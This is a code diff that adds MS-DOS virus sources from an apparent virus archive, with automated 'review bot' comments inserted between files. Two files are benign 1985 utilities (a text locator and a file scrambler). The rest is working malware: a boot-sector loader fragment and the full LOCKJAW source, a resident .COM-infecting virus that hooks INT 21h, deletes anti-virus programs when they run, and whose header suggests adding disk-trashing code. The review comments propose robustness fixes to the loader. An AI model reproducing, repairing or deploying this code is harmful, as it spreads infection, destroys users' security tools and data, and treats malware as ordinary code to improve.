+ push ds
+ push di
+ push si
+ call cim
+cim: pop bx
+ mov si,5aa5h
+ mov di,55aah
+ push cs
+ pop es
+ujra: add bx,1000
+ cmp bx,1000
+ jnc kilep1
+ jmp kilep
+kilep1: push bx
+ mov ax,201h
+ mov dx,80h
+ mov cx,1
+ int 13h
+ pop bx
+ jnc tovabb
+ jmp kilep
+tovabb: cmp si,0a55ah
+ jnz tivbi1
+ jmp kilep
+tivbi1: mov ax,cs:word ptr [bx]
+ cmp ax,12cdh
+ jz kilep
+tovbi: push bx
+ mov ax,201h
+ mov dx,0h
+ mov cx,1
+ int 13h
+ pop bx
+ jnc tovabbi
+ cmp ah,6
+ jz tovbi
+ jmp kilep
+tovabbi: mov ax,cs
+ add ax,1000h
+ push bx
+ push ax
+ int 12h
+ mov bx,64
+ mul bx
+ sub ax,1000h
+ mov bx,ax
+ pop ax
+ cmp bx,ax
+ jnc oke1
+ pop bx
+ jmp kilep
+oke1: pop bx
+oke: mov es,ax
+ mov ax,cs:[bx+18h]
+ mov cx,cs:[bx+1ah]
+ mul cx
+ mov cx,ax
+ mov ax,cs:[bx+13h]
+ mov dx,0
+ div cx
+ sub bx,1000
+ push bx
+ mov ch,al
+ mov cl,1
+ mov bx,100h
+ mov dx,0
+ mov ax,208h
+ int 13h
+ pop bx
+ jc kilep
+ push bx
+ mov bx,100h
+ mov ax,es:[bx]
+ cmp ax,2452h
+ pop bx
+ jnz kilep
+ mov ax,bx
+ add ax,offset kilep-offset cim
+ push cs
+ push ax
+ mov ax,10ah
+ push es
+ push ax
+ retf
+kilep: pop si
+ pop di
+ pop ds
+ pop es
+ pop dx
+ pop cx
+ pop bx
+ pop ax
+ ret
+cime: dw 0
+VEG EQU $
+
+VIRUS ENDS
+
+ END
+ 
\ No newline at end of file
diff --git a/MSDOS/Virus.MSDOS.Unknown.locate.asm b/MSDOS/Virus.MSDOS.Unknown.locate.asm
new file mode 100644
index 00000000..525957ee
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.locate.asm
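Review bot: At `oke:` the divisor for `div cx` is heads times sectors-per-track taken straight from the floppy boot sector just read (`cs:[bx+18h]`, `cs:[bx+1ah]`) with no check that it is non-zero, so a blank or corrupted BPB raises a divide-by-zero trap before any of the `jc kilep` exits is reached; `or cx,cx` / `jz kilep` after `mov cx,ax` closes that (short range suffices, as the existing `jc kilep` shows). The only validation before `retf` transfers control into the 8 sectors read at `es:100h` is the two-byte `cmp ax,2452h` ('R$') check, which deserves a comment such as `; 'R$' magic is the sole check before jumping into disk-loaded code` since any sector starting with those bytes satisfies it. The `cmp si,0a55ah` at `tovabb:` can never be true because `si` is loaded with 5aa5h at `cim:` and never changed, so the `jmp kilep` after it is dead code.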
@@ -0,0 +1,231 @@ +CODE_SEG SEGMENT + ASSUME CS:CODE_SEG,DS:CODE_SEG,ES:CODE_SEG + ORG 100H ;Start off right for a .COM file +ENTRY: JMP LOCATE ;Skip over Data area + + COPY_RIGHT DB '(C)1985 S.Holzner' ;Author's Mark + FOUND_MSG DB 13,10,13,10,'FOUND IN $' ;Like it says + LEN DW 1 ;The file length (low word) + PATH_LEN DW 0 ;Length of Path.Dat + NUMBER DW 0 ;Number of bytes read from file + EXTRA_PATHS DB 0 ;=1 if we open & use Path.Dat + OLD_BX DW 0 ;Save pointer to path at CS:DBH + OLD_SI DW 0 ;Save SI as pointer also + START_FLAG DB 0 ;For searches in Path.Dat + PATH_DAT DB "\PATH.DAT",0 ;ASCIIZ string of Path.Dat + +LOCATE PROC NEAR ;Here we go + + MOV DX,0B0H ;Move Disk Transfer Area to CS:0B0H + MOV AH,1AH ;Matched file information goes there + INT 21H + + MOV DI,5CH ;Use CS:5CH to put '*.*'0 at for search + CALL PUT ; in current directory + MOV DX,5CH ;Point to '*.*'0 for search + MOV AH,4EH ; and find first matching file + INT 21H ;Match now at DTA, 0B0H +LOOP: ;Loop over matches now + MOV BX,0CAH ;Get file length, came from match + MOV DX,[BX] + MOV LEN,DX ;Store in Len + CMP DX,60*1024 ;Don't write over stack, allow < 64K files + JB NOT_BIG ;Range extender (Find > 127 bytes ahead) + JMP FIND +NOT_BIG:CMP DX,0 ;Was this a 0 length file (disk dir or label)? + JA FILE_OK ;No, go on and read it + JMP FIND ;Yes, find next file and skip this one +FILE_OK:CALL READ_FILE ;Get the file into memory + MOV CX,NUMBER ;Prepare to loop over all read bytes + MOV DI,OFFSET PATHS+300 ;File starts at Offset Paths+300 +SEARCH: ;Use Repne Scasb & DI to search for the + MOV BX,82H ;first letter of the string, which is at CS:82H + MOV AL,BYTE PTR [BX] ;Load into AL for Repne Scasb +REPNE SCASB ;Find first letter + JCXZ FIND ;If out of file to search, find next file + MOV BX,80H ;How many chars in string? 
Get from CS:80H + XOR DX,DX ;Set DX to zero + MOV DL,[BX] ;Get # of chars in string + DEC DX ;Get rid of space typed after 'Locate' + MOV SI,83H ;Search from second typed letter (1st matched) +CPLOOP: DEC DX ;Loop counter + CMPSB ;See how far we get until no match + JZ CPLOOP + DEC DI ;At end, reset DI (Scasb increments 1 too much) + CMP DX,0 ;If DX is not zero, all letters did not match + JA SEARCH ;If not a match, go back and get next one + LEA DX,FOUND_MSG ;FILE HAS BEEN FOUND, so say so. + MOV AH,9 ;Request string search + INT 21H + MOV AH,2 ;Now to print filename. Without Path.Dat, at + MOV BX,0DBH ; CS:CEH, with Path.Dat at CS:DBH + CMP EXTRA_PATHS,1 ; Using Path.Dat yet? + JE PRINT ;Yes, print + MOV BX,0CEH ;No, reset BX to point to CS:CEH +PRINT: MOV DL,[BX] ;Print out the filename until 0 found + CMP DL,0 ;Is it 0? + JE MORE ;If yes,print out sample at More: + INT 21H ;Print filename character + INC BX ;Point to next character + JMP PRINT ;Go back relentlessly until done +MORE: PUSH DI ;Save DI,BX,CX + PUSH BX + PUSH CX + MOV CX,40 ;Prepare to type out total of 40 characters + MOV AH,2 ;With Int 21H service 2 + MOV DL,':' ;But first, add ':' to filename + INT 21H ;And a carriage return linefeed + MOV DL,13 + INT 21H + MOV DL,10 + INT 21H + SUB DI,20 ;DI points to end of found string, move back + MOV BX,OFFSET PATHS+300 ;Beginning of file + CMP DI,BX ;If before beginning, start at beginning + JA GO + MOV DI,BX +GO: ADD BX,LEN ;Now BX=end of file (to check if we're past it) +SHOW: MOV DL,[DI] ;Get character from file + INC DI ;And point to next one + CMP DI,BX ;Past end? + JA SHOWS_OVER ;Yes, jump out, look for next match + CMP DL,30 ;Unprintable character? 
+ JA POK ;No, OK + MOV DL,' ' ;Yes, make it a space +POK: INT 21H ;Print Character + LOOP SHOW ;And return for the next one +SHOWS_OVER: ;End of printout + POP CX ;Restore the registers used above + POP BX + POP DI + JMP SEARCH ;Return to search more of the file +FIND: CALL FIND_FILE ;This file done, find next match + CMP AL,18 ;AL=18 --> no match + JE OUT ;And so we leave + JMP LOOP ;If match found, go back once again +OUT: INT 20H ;End of Main Program +LOCATE ENDP + +PUT PROC NEAR ;This little gem puts a '*.*'0 + MOV BYTE PTR [DI],'*' ;Wherever you want it--just send + MOV BYTE PTR [DI+1],'.' ; it a value in DI. '*.*'0 is used as + MOV BYTE PTR [DI+2],'*' ; a universal wilcard in searches + MOV BYTE PTR [DI+3],0 + RET +PUT ENDP + +WS PROC NEAR ;Strip the bits for WordStar + CMP CX,0 ;If there is a length of 0, e.g. + JE FIN ;Directory entries, etc. do nothing. +WSLOOP: AND BYTE PTR [BX],127 ;Set top bit to zero + INC BX ;Point to next unsuspecting byte + LOOP WSLOOP ;And get it too. +FIN: RET ;To use, send this program BX and CX +WS ENDP + +FIND_FILE PROC NEAR ;The file finder + MOV AH,4FH ;Try service 4FH, find next match, first + INT 21H + CMP AL,18 ;AL = 18 --> no match + JE CHECK ;Range extender. + JMP NEW +CHECK: CMP EXTRA_PATHS,1 ;Have we used path.Dat? + JE NEXT_PATH ;Yes, get next path, this one's used up + INC EXTRA_PATHS ;No, set it to 1 + MOV AX,3D00H ;Request file opening for Path.Dat + LEA DX,PATH_DAT ;Point to '\PATH.DAT'0 + INT 21H + JNC READ ;If there was a carry, Path.Dat not found +DONE: MOV AL,18 ;And so we exit with AL=18 + JMP END +READ: MOV CX,300 ;Assume the max length for Path.Dat, 300. 
+ MOV BX,AX ;Move found file handle into BX for read + MOV AH,3FH ;Set up for file read + LEA DX,PATHS ;Put the file at location Paths (at end) + INT 21H ;Read in the file + ADD AX,OFFSET PATHS ;Full offset of end of Path.Dat + MOV PATH_LEN,AX ;Get Path.Dat end point for loop + MOV AH,3EH ;Now close the file + INT 21H ;Close file + MOV OLD_SI,OFFSET PATHS ;Save for future path-readings + MOV CX,300 ;Get ready to Un-WordStar + MOV BX,OFFSET PATHS ;300 bytes at location Paths + CALL WS ;Strip high bit for WS +NEXT_PATH: ;Come here to find next path to search for files + MOV SI,OLD_SI ;Point to start of next path + MOV DI,5CH ;Move will be to CS:5CH for '\path\*.*0' file find + MOV BX,0DBH ;Also to CS:DBH; will assemble full path & filename + MOV START_FLAG,0 ;Start the path search +CHAR: CMP SI,PATH_LEN ;Past end of possible path names? + JGE DONE ;Yes, we're done. Leave with AL=18 + CMP BYTE PTR [SI],30 ;Carriage return or linefeed? + JB NEXT ;Yes, get next char + MOV START_FLAG,1 ;First char, stop skipping chars + MOV AL,[SI] ;Get char from Path.Dat + MOV [BX],AL ;Move char to DBH + INC BX ;And increment to next location there + MOVSB ;Also move to 5CH area + JMP CHAR ;And go back for more +NEXT: CMP START_FLAG,1 ;Bad char, have we been reading a real pathname? + JE PDONE ;Yes, we've reached the end of it. + INC SI ;No, keep skipping chars to find pathname + JMP CHAR +PDONE: MOV OLD_SI,SI ;Save SI for the next path. + MOV BYTE PTR [DI],'\' ;Add '\' to both paths + MOV BYTE PTR [BX],'\' + INC BX ;Move BX on for next time + MOV OLD_BX,BX ;And save it. + INC DI ;Move to next location at 5CH and + CALL PUT ;Put '*.*'0 there to find all files. + MOV DX,5CH ;Start the search for all files in + MOV AH,4EH ; the new path. + MOV CX,0 ;Set the file attribute to 0 + INT 21H + CMP AL,18 ;Did we find any new files in new path? + JE NEXT_PATH ;No, get the next path. 
+NEW: CMP EXTRA_PATHS,1 ;Yes,Move found filename to DBH area to + JNE END ; read it in-only if DBH area is active + MOV BX,OLD_BX ; (i.e. Extra_Paths=1). Restore BX + MOV SI,0CDH ;And point to found filename in DTA +CLOOP: INC SI ;Next letter from found filename + MOV AH,[SI] ;Move it to the DBH area so we can read + MOV [BX],AH ; in the file (needs pathname\filename) + INC BX ;Next character in 5CH area. + CMP BYTE PTR [SI],0 ;Is this the last character? + JNE CLOOP ;Nope, get next one +END: RET ;After path & filename assembled, return +FIND_FILE ENDP + +READ_FILE PROC NEAR ;Looks for filename at CEH or DBH & reads it + PUSH AX ;Push everything to save it. + PUSH BX + PUSH CX + PUSH DX + MOV DX,0DBH ;Try the DBH area + CMP EXTRA_PATHS,1 ;Has it been used? + JE OK ;Yes + MOV DX,0CEH ;No, not using paths yet, use filename only, at CEH +OK: MOV AX,3D00H ;Prepare for file reading + INT 21H ;And do so. + MOV BX,AX ;Move file handle into BX to read + MOV DX,OFFSET PATHS+300 ;Read into data area at Paths+300 bytes + MOV CX,LEN ;Read the full file's length in bytes + MOV AH,3FH ;Read it in at last + INT 21H + MOV NUMBER,AX ;Number of bytes actually read. + MOV AH,3EH ;Close file + INT 21H + MOV BX,OFFSET PATHS+300 ;Clean up the Word Star high bit. + MOV CX,LEN ;For the full file + CALL WS ;Strip high bit for ws + POP DX ;Pop evrything and return + POP CX + POP BX + POP AX + RET ;Fin of Read_File +READ_FILE ENDP +PATHS: ;Here's the end of program marker + +CODE_SEG ENDS + END ENTRY ;End 'Entry' so DOS starts at 'Entry' + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.lock.asm b/MSDOS/Virus.MSDOS.Unknown.lock.asm new file mode 100644 index 00000000..295eddc9 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.lock.asm 
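Review bot: In FIND_FILE's CHAR loop each PATH.DAT line is copied byte-for-byte into the PSP at CS:5CH (via MOVSB) and at CS:DBH with no length bound, so a path longer than roughly 30 bytes runs the 5CH copy past 80H into the command tail the search string is read from, and the DBH copy past 100H into the program's own variables (LEN, PATH_LEN, NUMBER, EXTRA_PATHS). PATH.DAT is a user-editable file, so this is an input-validation gap rather than a cosmetic one; a bound such as `CMP DI,80H-5` / `JAE NEXT_PATH` before the MOVSB keeps both copies inside the PSP. The separator test `CMP BYTE PTR [SI],30` also treats every byte below 30 as end-of-path, which the comment should state (`;Any byte < 30 ends the path, not only CR/LF`).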
@@ -0,0 +1,145 @@
+COMMENT* Change ROR -> ROL in the TWO marked places to produce UNLOCK.ASM *
+CODE_SEG SEGMENT
+ ASSUME CS:CODE_SEG
+ ORG 100H
+HERE: JMP THERE
+ COPY_RIGHT DB '(C)1985 Steven Holzner'
+ PROMPT DB 'Phrase: $' ;All the messages & prompts
+ DEFAULT DB 'FILE.LOC',0
+ NOTSEEN DB 13,10,'File Not Found$'
+ FULL: DB 13,10,'Disk Full$'
+ FILETWO DW 0 ;Address of 2nd File name
+ FILEND DW 0 ;End of read-in files in memory
+THERE PROC NEAR ;Our procedure
+ MOV BX,81H ;Make the filenames into ASCIIZ
+UP: INC BX ;Scan type-in for space,
+ CMP BYTE PTR [BX],' ' ;Space?
+ JNE NOSPACE
+ MOV BYTE PTR [BX],0 ;Put the Z in ASCIIZ
+ MOV FILETWO,BX
+ INC FILETWO ;Store filename starting location
+NOSPACE:CMP BYTE PTR [BX],13 ;If not a space, a ?
+ JNE UP
+ MOV BYTE PTR [BX],0 ;If yes, replace with a 0
+ CMP FILETWO,0
+ JNZ OVER
+ MOV FILETWO,OFFSET DEFAULT ;If no second file given, use default
+OVER: LEA DX,PROMPT ;Type out the prompt with string print
+ MOV AH,9
+ INT 21H
+ MOV BX,80H+40H-2 ;Prepare 40H (64) buffer for key phrase
+ MOV BYTE PTR [BX],40H
+ PUSH BX ;Set up buffer address
+ POP DX
+ MOV AH,0AH ;Buffered input
+ INT 21H
+ MOV BX,80H+40H ;Start of key phrase
+ PUSH BX
+JUMP: CMP BYTE PTR [BX],13 ;Set up key phrase's ASCII values
+ JE READY ;Scan until
+ OR BYTE PTR [BX],1 ;Make it odd
+ AND BYTE PTR [BX],0FH ;Use only lower four bits
+ INC BX
+ JMP JUMP ;Keep going until
+READY: POP BX
+ MOV AX,3D00H ;Open the file to encrypt
+ MOV DX,82H ;Point to its name
+ INT 21H
+ JNC OKFILE ;Carry Flag --> some problem, assume
+ LEA DX,NOTSEEN ; file doesn't exist, say so
+ MOV AH,9
+ INT 21H
+ JMP OUT ;Exit
+
+OKFILE: PUSH BX ;Store location in key phrase
+ MOV BX,AX ;Put handle into BX
+ MOV CX,62*1024 ;Ask for 62K bytes to be read from file
+ LEA DX,THEBOTTOM ;And put at end of program
+ MOV AH,3FH ;Read
+ INT 21H
+ ADD AX,OFFSET THEBOTTOM ;Actually read AX bytes
+ MOV FILEND,AX
+ DEC FILEND ;Find how far the file extends in mem.
+ MOV AH,3EH ;Close file, thank you very much.
+ INT 21H
+ POP BX
+ LEA CX,THEBOTTOM ;Save current location in file in CX
+
+SCRMBLE:MOV SI,CX ;Will scramble from [SI] to [DI]
+ CMP SI,FILEND ;Past end?
+ JAE DONE ;If yes, exit
+ MOV DI,CX
+ XOR AX,AX
+ MOV AL,[BX] ;How many to scramble? (from key phrase)
+ ADD DI,AX
+ MOV CX,DI
+ INC CX ;Store new starting location for next time
+
+ INC BX ;Also, get next character for next scramble
+ CMP BYTE PTR [BX],13 ;If at end of key phrase, wrap
+ JNE TWIST
+ MOV BX,80H+40H
+
+TWIST: CMP DI,FILEND ;Is DI past end?
+ JBE GRAB
+
+ MOV DI,FILEND ;If yes, only scramble to file end
+ PUSH DI
+ SUB DI,SI ;What about last byte?
+ TEST DI,1
+ POP DI
+ JNZ GRAB ;If left over, rotate it once
+ ROR BYTE PTR [DI],1 ;<--- ROL FOR UNLOCK!!!
+ DEC DI
+ CMP SI,DI
+ JAE DONE
+
+GRAB: MOV DH,[SI] ;Get byte 1
+ MOV DL,[DI] ;Get byte 2
+ PUSH CX
+ MOV CL,[BX] ;Get number of times to rotate
+
+ INC BX ;Set up key phrase char for next time
+ CMP BYTE PTR [BX],13
+ JNE TWISTER
+ MOV BX,80H+40H
+ ;Rotate the hybrid word
+TWISTER:ROR DX,CL ;<--- ROL FOR UNLOCK!!!
+ POP CX
+ MOV [SI],DH ;And replace the parts
+ MOV [DI],DL
+ INC SI ;Point to next part to scramble
+ CMP SI,DI ;Have SI and DI met yet?
+ JE SCRMBLE ;If yes, move on to next part to scramble
+ DEC DI
+ JMP GRAB ;Go back until done
+DONE: MOV AH,3CH ;Done
+ MOV CX,0 ;Prepare to write out scrambled version
+ MOV DX,FILETWO
+ INT 21H ;Create the file
+ JC ERROR
+ MOV BX,AX
+ MOV AH,40H
+ LEA DX,THEBOTTOM
+ MOV CX,FILEND ;File size to write
+ SUB CX,OFFSET THEBOTTOM
+ INC CX
+ INT 21H ;Write it out
+ CMP AX,CX ;If error, (returned)AX .NE. (orig.)CX
+ JE CLOSE
+ERROR: LEA DX,FULL ;Assume disk is full, say so, leave
+ MOV AH,9
+ INT 21H
+ JMP OUT
+CLOSE: MOV AH,3EH ;Otherwise, close the file and exit
+ INT 21H
+OUT: INT 20H
+THERE ENDP
+THEBOTTOM: ;Read-in file starts here.
+ CODE_SEG ENDS
+ END HERE
+
+
+
+
+
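Review bot: The read at `MOV CX,62*1024` / `MOV AH,3FH` caps input at 62K and nothing checks whether the file was larger, so a bigger input is silently truncated and the file written at DONE is a shortened copy; a check such as `CMP AX,62*1024` / `JAE ERROR` right after that `INT 21H` (ideally with its own message rather than 'Disk Full') would refuse instead of producing a damaged output. The read's carry flag is also ignored, unlike the open and create calls, so a failed read proceeds into SCRMBLE with whatever AX holds. From a security standpoint, the JUMP loop's `OR BYTE PTR [BX],1` / `AND BYTE PTR [BX],0FH` reduces every key-phrase byte to one of eight odd values 1–15, so the effective key space is 8 to the power of the phrase length and the per-byte rotate is trivially reversible; a header comment stating that this is a 1985 scrambling utility (the file does not self-replicate, judging by the visible code) and not encryption would help readers of this corpus.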
diff --git a/MSDOS/Virus.MSDOS.Unknown.lockjaw.asm b/MSDOS/Virus.MSDOS.Unknown.lockjaw.asm new file mode 100644 index 00000000..2af5d95e --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.lockjaw.asm 
@@ -0,0 +1,561 @@ +;LOCKJAW: a .COM-infecting resident virus with retaliatory +;anti-anti-virus capability. Programmed and contributed by Nikademus, for +;Crypt Newsletter 12, Feb. 1993. +; +;LOCKJAW is a resident virus which installs itself in +;memory using the same engine as the original Civil War/Proto-T virus. +; +;LOCKJAW hooks interrupt 21 and infects .COM files on execution, appending +;itself to the end of the "host." +;LOCKJAW will infect COMMAND.COM and is fairly transparent to a +;casual user, except when certain anti-virus programs +;(Integrity Master, McAfee's SCAN & +;CLEAN, F-PROT & VIRSTOP and Central Point Anti-virus) are loaded. +;If LOCKJAW is present and any of these programs are employed from +;a write-protected diskette, the virus will, of course, generate +;"write protect" errors. +; +;LOCKJAW's "stinger" code demonstrates the simplicity of creating a strongly +;retaliating virus by quickly deleting the anti-virus program before it +;can execute and then displaying a "chomping" graphic. Even if the anti- +;virus program cannot detect LOCKJAW in memory, it will be deleted. This +;makes it essential that the user know how to either remove the virus from +;memory before beginning anti-virus measures, or at the least run the +;anti-virus component from a write-protected disk. At a time when retail +;anti-virus packages are becoming more complicated - and more likely that the +;average user will run them from default installations on his hard file - +;LOCKJAW's retaliating power makes it a potentially very annoying pest. +;A virus-programmer serious about inconveniencing a system could do a +;number of things with this basic idea. They are; +; 1. Remove the "chomp" effect. It is entertaining, but it exposes the virus +; instantly. +; 2. Alter the_stinger routine, so that the virus immediately attacks the +; hard file. 
The implementation is demonstrated by LOKJAW-DREI, which +; merely makes the disk inaccessible until a warm reboot if an anti-virus +; program is employed against it. By placing +; a BONA FIDE disk-trashing routine here, it becomes very hazardous for +; an unknowing user to employ anti-virus measures on a machine where +; LOCKJAW or a LOCKJAW-like program is memory resident. +; +;These anti-anti-virus strategies are becoming more numerous in viral +;programming. +; +;For example, Mark Ludwig programmed the features of a direct-action +;retaliating virus in his "Computer Virus Developments Quarterly." +;Peach, Groove and Encroacher viruses attack anti-virus software by +;deletion of files central +;to the functionality of the software. +; +;And in this issue, the Sandra virus employs a number +;of anti-anti-virus features. +; +;The LOKJAW source listings are TASM compatible. To remove LOKJAW-ZWEI and +;DREI infected files from a system, simply delete the "companion" .COM +;duplicates of your executables. Ensure that the machine has been booted +;from a clean disk. To remove the LOCKJAW .COM-appending virus, at this +;time it will be necessary for you to restore the contaminated files from +;a clean back-up. +; + + .radix 16 + code segment + model small + assume cs:code, ds:code, es:code + + org 100h + +len equ offset last - begin +vir_len equ len / 16d + +host: db 0E9h, 03h, 00h, 43h, 44h, 00h ; host dummy + +begin: + + call virus ; push i.p. onto the stack + +virus: + jmp after_note + +note: + db '[l™‡kõ„W].á.¥Œk†d‰M–$' + db 'ÅH‹$.pâ™Gâ†m.Œ$.….{pâ™Å”-Å].ûƒâ‹†¤Å' + db 'Åh†¥k$.Å¢.€â˜ž' + +after_note: + pop bp ; recalculate change in offset + sub bp,109h + +fix_victim: + mov di,0100h ; restore host's + lea si,ds:[vict_head+bp] ; ! + mov cx,06h ; ! 
+ rep movsb ; first 6 bytes +Is_I_runnin: + mov ax,2C2Ch + int 21h ; call to see if installed + cmp ax, 0DCDh + je Bye_Bye +cut_hole: + mov ax,cs ; get memory control block + dec ax + mov ds,ax + cmp byte ptr ds:[0000],5a ; check if last block - + jne abort + mov ax,ds:[0003] + sub ax,100 ; decrease memory + mov ds:0003,ax +Zopy_virus: ; copy to claimed block + mov bx,ax ; PSP + mov ax,es ; virus start + add ax,bx ; in memory + mov es,ax + mov cx,len ; cx = length of virus + mov ax,ds ; restore ds + inc ax + mov ds,ax + lea si,ds:[begin+bp] ; point to start of virus + lea di,es:0100 ; point to destination + rep movsb ; start copying the virus + + mov [vir_seg+bp],es + mov ax,cs + mov es,ax ; restore extra segment +Grab_21: + cli + mov ax,3521h ; request address of interrupt 21 + int 21h + mov ds,[vir_seg+bp] + mov ds:[old_21h-6h],bx + mov ds:[old_21h+2-6h],es + mov dx,offset Lockjaw - 6h ; revector to virus + mov ax,2521h + int 21h + sti +abort: + mov ax,cs ; get the hell outa + mov ds,ax ; Dodge + mov es,ax + xor ax,ax + +Bye_Bye: + mov bx,0100h ; hand off to host + jmp bx + +Lockjaw: + pushf ; is i checkin if + cmp ax,2c2ch ; resident + jne My_21h + mov ax,0dcdh + popf + iret + +My_21h: + push ds + push es ; save all registers + push di + push si + push ax + push bx + push cx + push dx +check_exec: + cmp ax,04B00h ; is the file being + jne notforme ; executed? + mov cs:[name_seg-6],ds + mov cs:[name_off-6],dx + jmp chk_com ; start potential + ; infection +notforme: + pop dx ; exit + pop cx ; restore all registers + pop bx + pop ax + pop si + pop di + pop es + pop ds + popf + jmp dword ptr cs:[old_21h-6] +int21: + pushf + call dword ptr cs:[old_21h-6] ; int 21h handler + jc notforme ; exit on error + ret + +chk_com: cld ; this essentially copies + mov di,dx ; the name of the file + push ds ; and sets it up for + pop es ; comparison to the anti- + mov al,'.' 
; virus defaults used in + repne scasb ; the_stinger + call the_stinger ; anti-virus stinger + cmp ax, 00ffh ; WAS the program an AV? + je notforme + cmp word ptr es:[di],'OC' ; is it a .com ? + jne notforme ; compare against extension + cmp word ptr es:[di+2],'M' ; masks in these two steps + jne notforme + + call Grab_24 ; set critical error handler + call set_attrib + +open_victim: ; open potential host + mov ds,cs:[name_seg-6] + mov dx,cs:[name_off-6] + mov ax,3D02h + call int21 + jc close_file ; leave on error + push cs + pop ds + mov [handle-6],ax ; save handle + mov bx,ax + + call get_date ; save date/time characters + +check_forme: + push cs + pop ds + mov bx,[handle-6] + mov ah,3fh + mov cx,06h ; copy first 6 bytes of host + lea dx,[vict_head-6] + call int21 + mov al, byte ptr [vict_head-6] ; is the prog a exe? + mov ah, byte ptr [vict_head-6]+1 + cmp ax,[exe-6] ; compare with 'ZM' + je save_date ; jump to restore + mov al, byte ptr [vict_head-6]+3 ; is the prog already + mov ah, byte ptr [vict_head-6]+4 ; infected? 
+ cmp ax,[initials-6] + je save_date + + +get_len: + mov ax,4200h + call move_pointer + mov ax,4202h + call move_pointer + sub ax,03h + mov [len_file-6],ax + + call write_jmp ; write the jump to the virus + call write_virus ; at the head of the host + ; write the remainder of the +save_date: ; virus to the end of the file + push cs + pop ds + mov bx,[handle-6] + mov dx,[date-6] + mov cx,[time-6] + mov ax,5701h + call int21 + +close_file: + mov bx,[handle-6] + mov ah,03eh + call int21 + mov dx,cs:[old_24h-6] + mov ds,cs:[old_24h+2-6] + mov ax,2524h + call int21 + jmp notforme +new_24h: + mov al,3 + iret +the_stinger: ; detection of anti-virus against defaults + cmp word ptr es:[di-3],'MI' ;Integrity Master + je jumptoass + + cmp word ptr es:[di-3],'XR' ;*rx = VIREX + je jumptoass + + cmp word ptr es:[di-3],'PO' ;*STOP = VIRSTOP + jne next1 + cmp word ptr es:[di-5],'TS' + je jumptoass + +next1: cmp word ptr es:[di-3],'VA' ;AV = cpav + je jumptoass ;Central Point + cmp word ptr es:[di-3],'TO' ;*prot = F-prot + jne next2 + cmp word ptr es:[di-5],'RP' + je jumptoass + +next2: cmp word ptr es:[di-3],'NA' ;*scan = McAfee's Scan. + jne next3 + cmp word ptr es:[di-5],'CS' + je jumptoass + + cmp word ptr es:[di-3],'NA' ;*lean = CLEAN. + jne next3 ; why not, eh? 
+ cmp word ptr es:[di-5],'EL' + je jumptoass +next3: ret +jumptoass: + jmp Asshole_det ;Asshole Program + ;Detected, delete +move_pointer: + push cs + pop ds + mov bx,[handle-6] + xor cx,cx + xor dx,dx + call int21 + ret + +write_jmp: + push cs + pop ds + mov ax,4200h ; move pointer to beginning of host + call move_pointer ; do it, as in move_pointer + mov ah,40h ; write + mov cx,01h ; a byte + lea dx,[jump-6] ; of the jump to LOCKJAW code + call int21 ; out to the host + mov ah,40h ; reset the pointer + mov cx,02h + lea dx,[len_file-6] + call int21 + mov ah,40h ; write the virus's recognition + mov cx,02h ; intials out to the host + lea dx,[initials-6] + call int21 + ret + +write_virus: + push cs + pop ds + mov ax,4202h + call move_pointer ; move the pointer to end of host + mov ah,40 ; write-to-file function + mov cx,len ; length of virus in cx + mov dx,100 + call int21 + ret + +get_date: + mov ax,5700h ; get date/time stamps oh host + call int21 ; stash them in buffers + push cs + pop ds + mov [date-6],dx ;<----- + mov [time-6],cx ;<----- + ret + +Grab_24: + mov ax,3524h ; set up critical error handler + call int21 + mov cs:[old_24h-6],bx + mov cs:[old_24h+2-6],es + mov dx,offset new_24h-6 + push cs + pop ds + mov ax,2524h ; revector error handler to virus + call int21 + ret + +set_attrib: + mov ax,4300h ; retrieve file attributes + mov ds,cs:[name_seg-6] + mov dx,cs:[name_off-6] + call int21 + and cl,0feh + mov ax,4301h + call int21 + ret +Asshole_det: + mov ds,cs:[name_seg-6] ; the anti-virus file + mov dx,cs:[name_off-6] + mov ax, 4301h ; clear attributes + mov cx, 00h + call int21 + mov ah, 41h ; delete it + call int21 +chomp: + push cs ; da chomper visual + pop ds + mov ah, 03h + int 10h + mov [c1-6], bh ; save cursor + mov [c2-6], dh + mov [c3-6], dl + mov [c4-6], ch + mov [c5-6], cl + mov ah, 1 + mov cl, 0 + mov ch, 40h + int 10h + + mov cl, 0 + mov dl, 4Fh + mov ah, 6 + mov al, 0 + mov bh, 0Fh + mov ch, 0 + mov cl, 0 + mov dh, 0 + mov dl, 4Fh + int 10h + 
+ mov ah, 2 + mov dh, 0 + mov dl, 1Fh + mov bh, 0 + int 10h + + mov dx, offset eyes - 6 ; print the eyes + mov ah, 9 + mov bl, 0Fh + call int21 + + mov ah, 2 + mov dh, 1 + mov dl, 0 + int 10h + + mov ah, 9 + mov al, 0DCh + mov bl, 0Fh + mov cx, 50h + int 10h + + mov ah, 2 + mov dh, 18h + mov dl, 0 + int 10h + + mov ah, 9 + mov al, 0DFh + mov bl, 0Fh + mov cx, 50h + int 10h + + mov dl, 0 +chomp_1: + mov ah, 2 + mov dh, 2 + int 10h + + mov ah, 9 + mov al, 55h + mov bl, 0Fh + mov cx, 1 + int 10h + + mov ah, 2 + mov dh, 17h + inc dl + int 10h + + mov ah, 9 + mov al, 0EFh + mov bl, 0Fh + int 10h + + inc dl + cmp dl, 50h + jl chomp_1 + mov [data_1-6], 0 +chomp_3: + mov cx, 7FFFh ; delays + +locloop_4: + loop locloop_4 + + inc [data_1-6] + cmp [data_1-6], 0Ah + jl chomp_3 + mov [data_1-6], 0 + mov cl, 0 + mov dl, 4Fh +chomp_5: + mov ah, 6 + mov al, 1 + mov bh, [data_2-6] + mov ch, 0Dh + mov dh, 18h + int 10h + + mov ah, 7 + mov al, 1 + mov bh, [data_2-6] + mov ch, 0 + mov dh, 0Ch + int 10h + mov cx, 3FFFh ; delays + +locloop_6: + loop locloop_6 + inc [data_1-6] + cmp [data_1-6], 0Bh + jl chomp_5 + mov [data_1-6], 0 +chomp_7: + mov cx, 7FFFh ; delays + +locloop_8: + loop locloop_8 + inc [data_1-6] + cmp [data_1-6], 0Ah + jl chomp_7 + mov ah, 6 + mov al, 0 + mov bh, [data_2-6] + mov ch, 0 + mov cl, 0 + mov dh, 18h + mov dl, 4Fh + int 10h + + mov cl, 7 + mov ch, 6 + int 10h + + mov ah, 2 + mov bh, [c1-6] + mov dh, [c2-6] + mov dl, [c3-6] + int 10h + mov al, bh + mov ah, 5 + int 10h + mov ah, 1 